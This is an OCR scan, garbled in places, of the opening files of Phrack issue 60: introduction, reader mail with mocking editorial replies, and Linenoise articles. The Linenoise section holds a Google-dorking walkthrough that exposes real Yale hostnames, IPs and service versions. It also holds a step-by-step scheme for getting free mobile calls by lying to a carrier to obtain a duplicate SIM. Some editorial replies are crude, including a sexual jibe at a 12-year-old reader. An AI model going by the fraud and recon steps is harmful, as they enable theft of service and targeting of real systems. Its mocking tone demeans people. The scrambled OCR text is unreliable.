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Jingle bells jingle bells jingle all the way...X-MAS TIME IS PHRACK-MAS TIME. 


Wow, number #60 is out. Who ever thought that we will get that far :> Let’s 
take a look back in time who kept phrack going over all these years. Ladies 
and gentlemen, we are proud to present the final, latest, incomplete and 
maybe incorrect PHRACK EDITOR IN CHIEF TIMELINE BACK TO THE BEGINNING: 


DATE NAME PHRACKZ 
2001-08-11 p57..) 
1997-09-01 route pol..p56é) 
1997-04-09 route, Datastream Cowboy p50) 
1996-11-08 route, Datastream Cowboy, Voyager p49) 
1996-09-01 Voyager, ReDragon, route p48) 
1993-03-01 Erik Bloodaxe p42..p47 


( 
( 
( 
( 
( 
( 
1991-09-15 Dispater (p33..p4l 
( 
( 
( 
( 
( 
( 


1990-05-28 Crimson Death : 

1988-10-12 Taran King + Knight Lightning p20..p30 
1988-06-07 Crimson Death pl8s..pl9 
1988-04-07 Shooting Shark pl7) 

1987-11-01 Elric of Imrryr plé) 

1985-11-17 Taran King + Knight Ligthning pOl..pl15) 

--[[[ BEGIN OF SPACE & TIME - CREATION OF THE UNIVERSE —- THE GENESIS ]]]--- 


..we came a long way... 


What’s new? 


We revived Phrack Prophile to honor those who did some kewl stuff for 
the scene. 


This issue comes with a new section dedicated to tool annoucements 
Phrack armory). It showcases selected tools that have been released during 
the last few month and that we consider cool enough to be mentioned her 


ma 


=[ Table of Contents ] 
0x01 Introduction Phrack Staff 0x009 kb 
0x02 Loopback Phrack Staff O0x00b kb 
0x03 Linenoise Phrack Staff Ox0le kb 
0x04 Toolz Armory Packet Storm 0x00b kb 
0x05 Phrack Prophile on horizon Phrack Staff 0x009 kb 
0x06 Smashing The Kernel Stack For Fun And Profit noir Ox03e kb 
0x07 Burning the bridge: Cisco IOS exploits FX 0x028 kb 
0x08 Static Kernel Patching jbtzhm 0x072 kb 
0x09 Big Loop Integer Protection Oded Horovitz 0x067 kb 
OxO0a Basic Integer Overflows blexim Ox01lb kb 
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Ox0b SMB/CIFS By The Root ledin Ox07c kb 
OxO0c Firewall Spotting with broken CRC Ed3f 0x026 kb 
OxO0d Low Cost and Portable GPS Jammer anonymous 0x021 kb 
OxOe Traffic Lights plunkett 0x015 kb 
OxOf Phrack World News Phrack Staff 0x018 kb 
Ox10 Phrack magazine extraction utility Phrack Staff 0x015 kb 

[ 0x282 kb 


The latest, and all previous, phrack issues are available online at 
http://www.phrack.org. Readers without web access can subscribe to the 
phrack-distrib mailinglist. Every new phrack is sent as email attachment 
to this list. Every new phrack issue (without the attachment) is announced 
on the announcement mailinglist. 


[To subscribe to the announcement mailinglist: 
S$ mail announcement-subscribe@lists.phrack.org < /dev/null 


o subscribe to the distribution mailinglist: 
S$ mail distrib-subscribe@lists.phrack.org < /dev/null 


o retrieve older issues (must subscribe first): 

S$ mail distrib-index@lists.phrack.org < /dev/null 

S$ mail distrib-get.<n>@lists.phrack.org < /dev/null 
where n indicated the phrack issue [1..60]. 


Enjoy the magazine! 


Phrack Magazine Vol 11 Number 60, Build 3, Dec 28, 2002. ISSN 1068-1035 
Contents Copyright (c) 2002 Phrack Magazine. All Rights Reserved. 

Nothing may be reproduced in whole or in part without the prior written 
permission from the editors. 

Phrack Magazine is made available to the public, as often as possible, free 
of charge. 


| [CONTACT PA RoA Ce K MAGAZINE J]=--------- = 
Editors : phrackstaff@phrack.org 

Submissions >: phrackstaff@phrack.org 

Commentary : loopback@phrack.org 

Phrack World News : pwn@phrack.org 


We have some agressive /dev/null-style mail filter running. We do reply 
to every serious email. If you did not get a reply, then your mail was 
probably not worth an answer or was caught by our mailfilter. Make sure 
your mail has a non-implicit destination, one recipient, a non-empty 
subject field, and does not contain any html code and is 100% Jbit clean 
pure ascii. 


Submissions may be encrypted with the following PGP key: 


rae BEGIN PGP PUBLIC KEY BLOCK----- 
Version: GnuPG v1.0.6 (GNU/Linux) 
Comment: For info see http://www.gnupg.org 


mQGiBDO3YTYRBADYg6kOTn jJEfrMANEGmoTLgxRZdfxGpvaU5MHPq+XHvuFAWHBm2 
xB/9ZcRt 4XIXw0OTL441ixL6fVGPNxjrRmAUt XSWrE1GJ51Tj7VdJmdt /DbehzGb 
NXekehG/r6KLHX0PQNzcr84sY6/GrZUiNZft YA/eUWDB7E jJEmkBIMs 3bnwCg3KRb 
96G68Zct+T4ebUrV5/dkYwFUEAMgSGUpdy 8yBWaFUsGOsGkr2Zfdf6tRA+GGOnqjs 
LhoO94L8iuTfbxr7z04E5+uToantAl56fHhnEy 7hAKIxuQdWw1COGKktUDhG1tUxrob 
zZSNAN6cBpruT7//QgdOlm3nE2E5myozhhMxLMj jF11mNol1YrNUEU4t YWm/Zvg90F 
Te8TBADS 40afB6pT 9IBHGOWhOED1bORKk /KdHuUBMrgwK8vb/e36p6KMj}8xBVINGLY 
JtIn6Iv14z8Pto62SEzlcgdsieoVneztQgLIrvCN+vK jv8 jJEGFtTmihx6f/VC7px 
oLX2419rePYaXCPVhw3xDN2CVahUD9 jTKFE2eOSFiWJ7DqUsIrQkcGhyYWNrc3Rh 
ZmYgPHBocmF ja3NOYWZmQHBocmF jay5vemct+iF cEEXECABCFA)03YTYFCwcKAwQD 


GJ 
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phrack.org:~# cat /dev/random 
==Phrack Inc.== 


Volume O0x0b, Issue 0x3c, Phile #0x02 of 0x10 


| [LOOPBACK] | 


| [ phrackstaff ] | 


-—---| QUOTE of the month 


[ Once upon a time in #phrack ] 


<OUAH: #phrack> *** PHRACK #60 SCHEDULED FOR 2002-12-27 *** 
<chmod_:#phrack> i know 

<chmod_:#phrack> its already 2 hours late 
<phrack_webmaster_undercover:#phrack> is it already the 27th? 
<chmod_:#phrack> yes 

<chmod_:#phrack> in some parts of the world 

<bajkero:#phrack> Fri Dec 27 02:01:13 CET 2002 


[ Meanwhile: phrack_webmaster_undercover doing the 
s/27th/28th/g thingie on index.php ] 


<phrack_webmaster_undercover:#phrack> hmm. strange, it reads 28th here. 
<chmod_:#phrack> they changed recently 

<chmod_:#phrack> it was 27th just one hour ago 
<phrack_webmaster_undercover:#phrack> mysterious... 


—---| Statistics of the month 


root@phrack.org:/var/log > grep ’\.mil’ httpd_access.log | uniq | we -1l 
248 

root@phrack.org:/var/log > grep ’\.gov’ httpd_access.log | uniq | we -l 
937 

}=[ 0x01 ] 


Editor in Chief!!!! 


[ Nope, sorry I’m just the phrackstaff’s slave answering the emails. ] 


I have been trying to get the phrack magazine but upto date I have not 
succeeded... I come from an African country called "kenya" and it seems they 
dont bring them there!!!!!! Please send me the subscription and the 


[ Kenya, 1.00North, 38.00East, 582,650sq, higest point you can read 

phrack: Mount Kenya 5,199m, lowest point: Indian Ocen (Om hehe.). 
Potential number of phrack readers: 31,138,735. Hacker growth rate: 1.15%, 
hackers life expactancy at birth: 47.02 years, Literacy: age 15 and over 
can read phrack. 78.1% of the total population can read phrack. 
http://www.cia.giv/cia/publications/factbook/geos/ke.html ] 


My address is fredie@kikuyu.com 
Yours truly 
Fredie.. 


[ Phrack is free. Nice to know that phrack read in all parts of the world, 
we definitely want to hear from you more often ] 


[=[ 0x02 ] 


From: Omar Tarabay <omar_tarabay@yahoo.com> 
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Subject: a real newbie 
Hey guys, 
[ Hello dude ] 


I read your last edition and it was just great, i visited the site daily 
to see if the new edition is down or not. 


[ oh, so that’s you in the weblogs? Hi :> ] 
I realy liked the files on your last edition (lockpicking was the greatest) 


i won’t ask questions that you expect me to ask like ’please tell me how to 
hack into hotmail or the pentagon’. 


[ Oh man, you missed it, I had some Oday for you ] 


put i read myself and learn things myself but as a newbie i don’t find 
most of your articles understandable,its only for experts and pros so 

if you can write articles for newbies like me and many others who want to 
learn please do, and about myself i amTURBOWEST(i am sure that u can know 
my real name easily but please don’t say it) 


[ Your real name is: TURBOEAST! ] 
I am 12 y/o 
[ Nothing to be ashamed of. We will be at the same age in 13 years. ] 
I program in python . I am trying to install linux on my PC but i face 


some problems which i am trying to solve(i read a lot of books about 
linux) 


[ You read these linux books? What did they teach you? How to format 
your harddrive, install a webcam and masturbate with 13 years old 
girls on netmeetings? ] 


finaly i would like to say thanks for all the phrack staff and ask them to 
reply to me. 


TURBOWEST 


[ Nothing. Hope you wont get any problems with the pedophile child 
molesters who get back to you now... ] 


[=[ 0x03 ] 


From: George escobar <dierwolf2@yahoo.com> 
Subject: thanks 


i found your site informative. thanks 
dierwolf2 


[ at your service! We dont take money donation, however you can send 
female shaped human beings. ] 


[=[ 0x04 ] 


From: "Anthony Webb" <a_gentle_man@hotmail.com> 
Subject: OK..I’m stupid, but help me anyway 


OK, I admit it...I love the website, but I can’t find my way around in it. 
Yeah, I know, I’m dumber than a bag of rusty hammers. But I need help. 


[ It is a good start to admit it, let’s look at your case ] 


I am looking for a simple program to keep track of my companies phone calls 
without the company knowing I’m doing it. 
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[ Oh man ... that’s not good at all ... ] 


No, I am NOT paranoid, they ARE out to get me. 


[ Honestly, you are not! Be prepared for the worst! Watch Jackie Chan 
and Akira movies on a daily base to train your ninja-style to be 
prepared to whatever there might come. Huh? Did you hear that? 

THEY ARE ALREADY AT YOUR DOOR. RUUUUUUUUUUUUUUUUUUN! J 


I don’t have $1100 to $2500 to spend on Call Accounting Software and I 
don’t need all those bells and whistles anyway. I just need to keep track 
of who the people are talking to, what time, what extension, whether its 
outbound or inbound, etc. The company has an Avaya (Lucent) Merlin Magix 
PBX system. By tracking who they call I can establish that they are indeed 
guilty of harrassment against my paranoid little butt. 


Got any ideas? gentle....but pissed at the organization. 


[ Are you sure that noone of your coworkers watched this email? ] 


[=[ 0x05 ] 


From: domino@hush.com 


can I please get those zines in zip format, they are interesting, but I use 
windows. If not, can you complete the articles? I was reading one, and it 
was in txt and it said 9 of 10. there was no link to the 10th article. this 
happened many times with different ones. Yeah anyways, I would be nice to 
have those as zip files for those who don’t have linux as would many others, 
or at least fix the links. (not much of a problem just missing a page) 

Great magazine, I just wish that I could complete it. thanx. 


[ (man winzip) || (man google) || (man brain) || (man life) || (man gun) ] 


|=[ 0x06 ] | 
From: "melissa royer" <melissa.royer@verizon.net> 
Hello 


I am having some trouble compiling the code extracted from your site. I 
have the code on linux RH 7.3 Is this the problem?? 


[root@lenny Loki]# make linux 


make[1l]: *** [surplus.o] Error 1 
make[1]: Leaving directory ‘/loki/loki2/Loki’ 
make: *** [linux] Error 2 


[ I swear this dood*H*H*H*‘H Melissa really tried to compile that 7 years old 
source from p49. Unless we turn into a red-hat-gcc-problems-support-—center 
will we not give any hints. Rumours about any fusion on the latter topic 
can not be confirmed or denied at this point. ] 


[=[ 0x07 ] 


, 


[ someone with a ’new’ and ‘unbreakable’ crytpo idea of his own ] 


[ blah blah ] ...didn’t know Applied Cryptography, thanks for the link. 
[ blah blah ] ...one time pad are maybe not very usefull but they are for 
hackers ...[ blah blah ]. When a friend of mine rooted NASA i used one-time 


pads to tell my other friends [ blah blah blah ]. 


[ So what’s your general recommendation then? That we should banish 
blowfish and use one-time-pad’s because they are..err..better when 
we want to tell our...err..friends that we ..err..hacked NASA? hu? ] 
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LL 


From: 
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"Bowman, 


Michael" <Michael.Bowman@ed.gov> 


SUBSCRIBE Phrack 


[= 


[ 


0x09 | 


Dear Government Of 


our schoolars already succ 
have any further problems. 
next monday or we are urget to inform the director about your lack 
of success. ] 


Education, you failed to subscribe where your 


ded. Please ask your classmate if you 
We are awaiting your second trial until 


[ from web comments to phrack 3-9, 2002-11-07 
FromL laipie@ms14.url.com.tw 


Hello 


I want to download some material from your website. 


l=[ 


[ Our links are protected by some kind of intelligent checker. You 
have to press ALT-Q while clicking on the link (quickly!). ] 


Ox0a | 


From: 


Well you may know me as the 


"Dustin Smith" 
Subject: 


<dustinsmith01@hotmail.com> 


The unfortunate life... 


"script kiddy" but lately i ma having 


illusions of Grandure and am aspiring to be...I dont dare say it 

cuz I am stillso far off but yet so close. So a subsription to your Hol 
grail will be just peaches...In all humbleness of the greatness 

that is possed by few I bid you adue... 


[ 


THIS IS NOT MADE 


UP! 


We really get these kind of emails! ] 


Broadband? Dial-up? Get reliabl 


[ 


Get a brain first! 


] 


MSN Internet Access. 


y 


|=[ O0x0b ] 
From: "Princess Of Darkness" <broken_flowers@hotmail.com> 
Subject: symantec 
uhh... hello. 
tiwaves:: 
My name’s Rosie. hi. I really actually know very little to nothing about 
hacking... and it’d like to know more. I know links, websites, etc. etc. 
[ That’s a beginning! 
Lesson2: "How do I read the website". 
Lesson3: "How do I understand the website" 
Lesson4: "How do I utilize the website" 
Lesson5: "How do I hire for a lawyer" 
Lesson6: "How do I escape the feds" ] 


but when you can’t even write html it makes things a little difficult. 
I feel so retarded. don’t laugh. 


[ 


I’m a lamOr, i know. 


The real reason why phrack comes as .txt is because noone knows 
this < > -thingie either. 


] 


God 
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anyway, thanks a lot for like.. reading this... 
[ thanks a lot for like... writing this... ] 
and uh.. don’t find out where i live... cos that’s... scary.. 0O.0;; 


adios 
=O523* 


[=[ Ox0c ] 


From: anthony charles <bemoeasy@yahoo.com> 
Subject: EAGER STUDENT 


Dear editor, 


1 was directed by somebody i met online that i should 
contact your mag about being a hacker.I’m resident in 
Nigeria,West Africa. 1 would be very grateful if you 
can assist me because it has been my dream to be a 
hacker. 


The users in the hackers lounge in yahoo chat are too 
fast for me. i need to learn the rudiments of becoming 
a hacker.Every start’s somewhere...this is where i 
start if you would honor me by imparting knwledge to 
an eager student. 


Awaiting your reply. 
yours sincerely 
Anthony Charles 


[ no comment ] 
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==Phrack Inc.== 


Volume 0x0b, Issue 0x3c, Phile #0x03 of 0x10 


| [ LINENOTIS 


al 
esi 


| [ Phrack Staff ] | 


--[{ Contents 


1 - The Dark Side of NTFS 
2 - Watching Big Brother 
3 -—- Free mobile calls 
4 
5 


—- Lawfully Authorized Electronic Surveillance [LAES] 
— Java Tears down the Firewall 


--[{ 1 - The Dark Side of NTFS 


Ok, this didnt fit anywher lse so we put it here: 


http://patriot.net/~ carvdawg/docs/dark_side.html 
--[ 2 - Watching Big Brother 


by da_knight <x6675766l16a6e@yahoo.com> 


Have you ever wanted to be the one doing the watching? If you are a 
system administrator of UNIX / Linux servers, then you may be aware of a 
product called Big Brother, which can be downloaded from 'http://bb4.com/’. 
This article is by no means technical, simply because it doesn’t need to 
be. It is divided into two sections, so bear with me for the briefing on 
Big Brother (BB). 


BB is a program that will monitor various computer equipment; things it 
can monitor are connectivity, cpu utilization, disk usage, ftp status, http 
status, pop3 status, etc. As you might imagine, this information is very 
important to an organization. BB is your standard client / server setup. 
The server software can run on various flavors of UNIX, Linux and NT. The 
client software is available for UNIX, Linux, NT, Mac, Novell, AS/400, and 
VAXEN; some client software is provided by 3rd-party vendors and not 
supported by BB4 Technologies. 


The cool thing about this is all of this information is viewed on a web 
page. So, if you have multiple servers that you have to maintain, with this 
product you would be able to go to one web page and quickly get a status of 
all of those servers pretty handy. When everything is fine your status is 
"green", major problems are indicated by "red". 


Example: The connectivity (conn) status is done by pinging the 
equipment in question; if the ping fails then it would appear as a red zit 
on the web page. When tests such as this fail, BB can be configured to 
automatically page the administrator. 


Here is a quick run down of the statuses, listed in order of severity: 


red — Trouble; you’ve got problems. 
purple - No report; the client hasn’t responded in the last 30 minutes. 
yellow - Attention; a threshold has been crossed. 


green -— OK; take the day off. 
clear - Unavailable; the test has been turned off. 
blue — Disabled; notification for this test has been turned off. 


The status is also reflected in the title of the web page, so it only 
takes one red zit to cause the web page title to start with "red:Big 
Brother"; we’re going to get into this in a minute. 
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A common thing for administrators to do is to monitor their most 
important systems with this product, as well as the most important aspects 
of each system. If you have a web server, you would want to monitor the 
http and conn statuses just to make sure people are still able to connect 
to the server. Other tests I have seen are to check Oracle, or to list all 
connected users. Hell, they even have a way to add weather reports. The 
point is, it’s pretty limitless what can be monitored, it just depends on 
what you deem important. 


Now that you have a little bit of an understanding what BB can do, I 
want to quote two things from BB4 Technologies (BB4) FAQ - Section 5: 
Security Considerations (http://bb4.com/bb/help/bb-faq.html#5.0). 
Everything in that section of the FAQ should be considered, but we’1l focus 
on these two. 


"BB does not need to run as root. We suggest creating a user ’bb’ and 
running bb as that user." "We recommend password-protecting the Big Brother 
web pages" 


So, you ask yourself, why are these things important to me? Well, one, 
you know that administrators who run this software probably have it setup 
using the user ’bb’, and that they may also be running it with root level 
access. This gives you a valid user account on a system and this account 
probably wouldn’t be used by a human very often so the password could be 
something simple. But that’s not the point of this article. The second 
thing is that BB4 realizes the information on these web pages is extremely 
important and they recommend password-protecting them. 


Following this logic you then say these are web pages, so it’s running 
on a web server and if they’re not password-protected and the server is 
visible to the WWW, then...that’s right search engines will find these 
pages and serve them up when you know what to look for. 


What are you waiting for? Go to 'http://www.google.com’ and search for 
"green:Big Brother" (include the quotes; it makes it more refined). You 
will get about 16,200 matches. Now that doesn’t mean that those are all 
unique because it will have numerous pages from the same site, but you get 
the point. I would estimate that there are over 200 sites that can be 
viewed this way. Remember to search for all the other statuses too, just 
change the name of the color. One more thing, I chose Google for a reason. 
Some of these sites no longer run the BB product, but Google has a nice 
ability to view cached pages, so you can still glean information from them. 


After you scroll through the list of sites you will realize that the 
majority of them are either small ISP’s or colleges. I’m going to pick ona 
college, an Ivy League one, no less. I can tell you from looking at this 
particular BB site that the BB server is running on a computer called 
‘artemis.cs.yale.edu’ and the IP address is '128.36.232.57’. Also the 
computer /rhino.zoo.cs.yale.edu’ is having some serious issues. How did I 
find the IP address? Simple; if you click on the "green" or whatever color 
button under the "conn" column, you will s a web page that has 
information similar to this: 


rhino.zoo.cs.yale.edu - conn 


green Sun Jun 30 01:33:15 EDT 2002 Connection OK PING 128.36.232.12 
(128.36.232.12) from 128.36.232.57 : 56(84) bytes of data. 64 bytes 
from 128.36.232.12: icmp_seq=0 tt1=255 time=379 usec 


--- 128.36.232.12 ping statistics --- 
1 packets transmitted, 1 packets received, 0% packet loss round-trip 
min/avg/max/mdev = 0.379/0.379/0.379/0.000 ms 
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Right there you know that the ping command was trying to ping 
'128.36.232.12’, in this case, ’rhino.zoo.cs.yale.edu’ and that it came 
from '128.36.232.57'’ or ‘’artemis.cs.yale.edu’. Let’s see what else we can 
find out. 


I can see that almost all of their servers run Tripwire, so they are 
UNIX systems, and you probably would have a hard time creating a backdoor 
account on these systems. On another page, we get to see the users who are 
currently logged in. Currently we have 33 users logged in, and seeing as 
it’s 1:33 AM, I think some people left their computers logged in. 


I want to get more information about Yale’s servers, so let’s go back 
to Google and look for another page from Yale, but this time look for 
'zelda.cs.yale.edu’. Now we can get some good information. When this site 
is displayed you will s quite a few servers, listed as well as several 
departments. If you want to know what software ’plucky.cs.yale.edu’ is 
using to run it’s HTTP services just click on the ’green’ button: 


plucky.cs.yale.edu —- http 


green Sun Jun 30 01:45:21 EDT 2002 


http://plucky.cs.yale.edu Server OK 
HTTP/1.1 200 OK 
Server: Microsoft-IIS/4.0 
Content-Location: http://plucky.cs.yale.edu/index.html Date: Sun, 30 
Jun 2002 05:45:21 GMT 
Content-Type: text/html 
Accept-—Ranges: bytes 
Last-Modified: Tue, 12 Jan 1999 20:49:40 GMT ETag: 
"54b4ec126d3ebe1:4051" 
Content-Length: 2226 


Seconds: 0.01 


What the hell? They’re actually running IIS 4.0? Don’t they know how 
insecure that is? But I digress. From that information you know that the 
server is some version of Windows NT and it has IIS 4.0 running, that could 
be handy. 


Zelda is also showing they monitor printers. Now that can be fun; what 
if the message "I think therefore I hack!" is sent to the printer 
‘philo-printer.philosophy.yale.edu’? And in case you’re wondering, the 
printer is an ’HP LaserJet 4050 Series’; I just had to click on the button 
under the "printer" column to find that out. 


Elsewhere on this same site, I find that several servers are running 
TELNET, POP3, Oracle, FTP, and IMAP. Most of these services will gladly 
tell you what version of the software they are running. Oracle, for 


instance, is even nic nough to show you all of the connected users. How 
can you thank them enough for this valuable information? 


Also, it seems only the geologists at Yale feel they have data that is 
of great importance. I wasn’t able to view what they monitor because of 
access permissions on their web site, but I do know that they are running 
their web server on Apache version 1.3.26. 


As you can see, I would be able to gather an enormous amount of vital 
infrastructure data in a few minutes. Plus, I didn’t break any laws. These 
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web pages are posted in a manner that the entire world can view them. It 
might take someone 10 minutes or more to find out a few facts about 1 
particular system, but in that amount of time I found numerous facts about 
over 40 systems at the same organization. Thanks Big Brother! 


I feel it should be mentioned that the information found on these web 
pages is information that most organizations don’t even let employees 
outside of the IT department see. I guess I should feel special since Yale 
must feel that I’m not a security risk, otherwise they would have made me 
authenticate to their web sites. 


Imagine this; an ISP that lists all of their routers complete with IP’s 
and model information. If you had that, you could possibly rely on 
vulnerabilities in SNMP discovered earlier this year, or better yet, rely 
on the default accounts / passwords setup on these types of devices. I only 
bring this up because I know I did come across an ISP that did list routers 
and the majority of the sites returned by Google seemed to be smaller ISPs. 


Also, about searching on Google, I would recommend searching for 
"red:Big Brother", because these pages will always give you more 
information than when the system is running perfectly. 


Finally, I didn’t write this article to condone breaking into systems 
and providing a means to that end. I wrote this because security is 
extremely important; with the information that is found because of this one 
product your environment could be compromised. If you are a system 
administrator for a site that shows up on Google you may want to secure 
your BB web pages, because by the time you read this the world is going to 
know your infrastructure. 


--[ 3 - Free Mobile Calls 


by eurinomo 


5 


x 


This bug can be utilized to make FR 
WAP. 


EB CALS, FREE SMS, and even FREE 


lst you have to see if you mobile network has the bug. Just call the 
service fr number (to don’t waste money) and say to them that you card 

is locked that you forgot your fone in your litle syster’s room and your 
mobile says "Sim Card is lock" or something, say that maybe yor sister have 
wronged the puk because the phone was powered off and now it’s on. Then the 
guy must say that you have to go to one of theyr Mobile Shops and say the 
problem and they will give you another card with the same number and money 
as the old. Ask them how much it will cost and the guy must say it’s for 
free! :-) 


Now the Matirial that youl need: 
—- A mobile phone not nokia (it’s better to be yours and not unlocked) 
- And a nokia(can be a unlocked 1 or steled or borrowed. Do as you wish!) 


How to do it: 


Mobilel = Not nokia 
Mobile2 Nokia 


Put the card in the mobilel and enter your pin. When it booted up put this 
code 3 times: 

**04*00000000*00000000*00000000# 

or try 

**05*00000000*00000000*00000000# 


Check the manual and search for the code to change the puk if the above 
examples dont work. Or give a email to motorola and say that you have a 
motorola phone and that you want to change the puk and you know that is a 
code to change (the code isn’t ilegal and it’s also specified in the 
manual). 
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If the code isnt the one that i have telled is 1 nerby. If you have a 
motorola flare when you put **04* or **05* it’ill say "Enter the old Puk" 
or something like that automatly and then ask the new puk code 2 times. But 
the important is to lock your card, i think you can do it also if you wrong 
the pin 3 times and then enter a wrong puk and vuala it’s locked! But what i 
was saing about the code it’s was tested but you can try this last too, use 
it in your on risk. 


Now goto the Mobile Shop and say what hapened (that your litle sister 
or a doughter of an friend of your mother or something like that...) And 
then they will dupicate the card and they will give you the new one and the 
old one. At last they normaly give the 2. 


Now the easy part. Put the old card in the nokia and boot it up and you 


see thats not locked!!! and if you put on anoher phone not nokia its says 
that its locked, the Bug is a more nokia Bug that a network Bug. Now send a 
SMS with the old card and see if disconted money. Then s if was disconted 


from the new card if not than it’s because the Network has the bug and you 
can waste the money off the old card as you wish but you only have 2 weeks 
or soo before they cut it out of the Network and it’s completly lock, but 
the new card stil have the same money and you can do it again and again 
that i think they woldn’t catch you. 


This was tested in the Portugal Vodafone Mobile Phone Network. 


--[ 4 - Introduction to Lawfully Authorized Electronic Surveillance (LAES) 


by Mystic <mystic@lostways.net> 


In 1994 Congress adopted the Communications Assistance for Law Enforcement 
Act (CALEA). It’s intent was to preserve but not expand the wiretapping 
capabilities of law enforcement agencies by requiring telecommunication 
providers to utilize systems that would allow government agencies a basic 
level of access for the purpose of surveillance. The act however does not 
only preserve the already existing capabilities of law enforcement to tap 
communications, it enhances them, allowing the government to collect 
information about wireless callers, tap wireless content, text messing, and 
packet communications. The standard that resulted from this legislation is 
called Lawfully Authorized Electronic Surveillance or LAES. 


A Telecommunications Service Provider (TSP) that is CALEA compliant 
provides means to access the fallowing services and information to Law 
Enforcement Agencies (LEAs): 


1. Non-call associated: Information about the intercept subjects that is 
not necessarily related to a call. 


2. Call associated: call-identifying information about calls involving the 
intercept subjects. 


3. Call associated and Non-call associated signaling information: Signaling 
information initiated by the subject or the network 


4. Content surveillance: the ability to monitor the subjects’ 
communications. 


This process is called the intercept function. The intercept function is 
made up of 5 separate functions: access, delivery, collection, service 
provider administration, and law enforcement administration. 


----[ 4.1 The Access Function (AF) 


The AF consists of one or more Intercept Access Points (IAPs) that 
isolate the subject’s communications or call-identifying information 
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unobtrusively. There are several different IAPs that can be utilized in 
the intercept function. I have separated them into Call Associated and 
Non-call Associated information IAPs and Content Surveillance IAPs: 


Call Associated and Non-call Associated information IAPs 


-— Serving System IAP (SSIAP): gives non-call associated information. 


— Call-Identifying Information IAP (IDIAP): gives call associated 
information and in the form of the fallowing call events for basic 
Cireude calls: 


Answer - A party has answered a call attempt 
Change -— The identity or identities of a call has changed 
Origination - The system has routed a call dialed by the subject or the 
system has translated a number for the subject 
Redirection - A call has been redirected (e.g., forwarded, 
diverted, or deflected) 
Releas The facilities for the entire call have 


been released TerminationAttempt - A call attempt to an 
intercept subject has been detected 


— Intercept Subject Signaling IAP (ISSIAP): provides access to 
subject-initiated dialing and signaling information. This includes if the 
intercept subject uses call forwarding, call waiting, call hold, or 
three-way calling. It also gives the LEA the ability to receive the 
digits dialed by the subject. 


— Network Signaling IAP (NSIAP): Allows the LEA to be informed about 
network messages that are sent to the intercept subject. These messages 
include busy, reorder, ringing, alerting, message waiting tone or visual 
indication, call waiting, calling or redirection name/number information, 
and displayed text. 


Content Surveillance IAPs 


The fallowing are content surveillance IAPs that transmit content using 
a CCC or CDC. An interesting note about content surveillance is that 
TSPs are not responsible for decrypting information that is encrypted by 
the intercept subject unless the data was encrypted by the TSP and the 
TSP has the means to decrypt it. 


-— Circuit IAP (CIAP): accesses call content of circuit-mode communications. 
— Conference Circuit IAP (CCIAP): Provides access to the content of 
subject-initiated Conference Call services such as three-way calling and 


multi-way calling. 


- Packet Data IAP (PDIAP): Provides access to data packets sent or received 
by the intercept subject. 


These include the fallowing services: 


ISDN user-to-user signaling 

ISND D-channel X.25 packet services 

Short Message Services (SMS) for cellular and Personal Communication Services 

Wireless packet-mode data services (e.g., Cellular Digital Packet Data 
(CDPD), CDMA, TDMA, PCS1900, or GSM-based packet-mode data services) 

X.25 services 

TCP/IP services 

Paging (one-way or two-way) 

Packet-mode data services using traffic channels 


----[ 4.2 The Delivery Function (DF) 


The DF is responsible for delivering intercepted communications to one 
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or more Collection 


hannels: Call Content Channels 
he CCCs are generally used to transport call 
CCCs are either "combined" meaning that they carry 


c 
T 

data communications. 

transmit and receive paths on the same channel 
t 

C 

W 


Functions. This is done over two distinct types of 


a 


(CCCs) and Call Data Channels (CDCs). 
content such as voice or 


or "separated" meaning 


hat transmit and receive paths are carried on separate channels. The 
DCs are generally used to transport messages which report 


hich is text based such as Short Message Service (SMS). Information 


over CDCs is transmitted using a protocol called the Lawfully Authorized 


Electronic Surveil 


lance Protocol 


----[ 4.3 The Coll 


The CF is responsib] 


communications and 


(LAESP) . 


ection Function (CF) 


le for collecting and analyzing intercepted 


call-identifying information and is the 


responsibility of the LEA. 


----[ 4.4 The Service 


Provider Administration Function (SPAF) 


The SPAF is responsible for controlling the TSP’s Access and Delivery Functions. 


----[ 4.5 The Law 


Enforcement Administration Function (LEAF) 


The LEAF is responsible for controlling the LEA’s Collection Function 
and is the responsibility of the LEA. 


Now that I’ve introduced you to LA 


ES lets look at an implementation of 


it that is on the market right now and is being used by some TSPs: 


Overview of the CALEAserver: 


The CALEAserver 


networks to become 


monitor wireless and wire 


is manufactured by SS8 Networks. It is a collection and 
delivery system for call information and content. It allows existing 


completely CALI 


EA compliant. 


It allows for a LEA to 


line communications and gather information about 


the calls remotely. The CALEAserver interfaces with the network through 
(SS7) which is an extension of the Public Switched 


Signaling System 7 
Telephone Network 


layers: the Hardware 


(PSTN). The CAL 


Application Software Layer. 


The Hardware Plat 


Platform Layer, 


FAserver is composed of three major 
the Network Platform Layer and the 


form Layer consists of the Switching Matrix and the 


Computing Platform. The Switching Matrix is an industry standard 


programmable switch. 


It contains Tl cards for voice transmission and cross 


connect between switches, DSP cards for the conference circuits required 
for the intercept and DTMF reception/generation, and CPU cards for 


management of the switch. 
mounted, UNIX based machine. 


The Computing Platform is a simplex, rack 


= 


It is used to run the CALEAserver application 


software that provides Delivery Function capabilities and controls the 


Switching Matrix. 


The Network Platform Layer provides SS7 capability, as well as, call 
processing APIs for the Application Software Layer. It also controls the 


Switching Matrix. 


The Application Software Layer is wher 
Administration functions are carried out. 


the Delivery and Service Provider 
It isolates the interfaces 


towards the Access and Collection Functions from the main delivery 
functionality allowing for multiple Access and Collection Functions through 


the Interface Modul 
existing functional 


System Capacity: 


lity. 


Configurable for up to: 


1000 Collection functions 
128 Access Function Interfaces 


les that can be added or modified without impacting the 
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32 SS7 links 
512 simultaneous call content intercepts on a single call basis 
64 Tl voice facilities 


Operating Environment: 


NEBS compliant, -48 volt, 19" rack mounted equipment 

Next-generation UltraSPARC processor 

66-MHz PCIbus 

Solaris UNIX operating system 

9Gbyte, 40-MB/sec SCSI disks 

512 Mbytes RAM standard 

Ethernet/Fast Ethernet, 10-BaseT and 100-BaseT 

Two RS-232C/RS-423 serial ports 

Programmable, scalable switch with up to 4000 port time slot interchange 


Features: 


Built in test tools for remote testing 
Full SS7 management system 
Alarm reporting and Error logging 
Automatic software fault recovery 
Automatic or manual disk backup 
SNMP support 
Optional support for X.25 and other collection function interfaces 
ITU standard MML and Java based GUI support 
Support of both circuit-switched and packet-switched networks 
Optional support for other access function interfaces as required for 
CALEA compliance, including: 
*HLR (Home Location Register) 
*VMS (Voice Mail System) 
*SMS (Short Message System) 
*CDPD wireless data 
*Authentication Center 
*Remote access provisioning 


This concludes the introduction to LAES. This being only an introduction, 
I’ve left out allot of details like protocol information. However, if you 
are interested it learning more about LAES I would suggest reading the TIA 
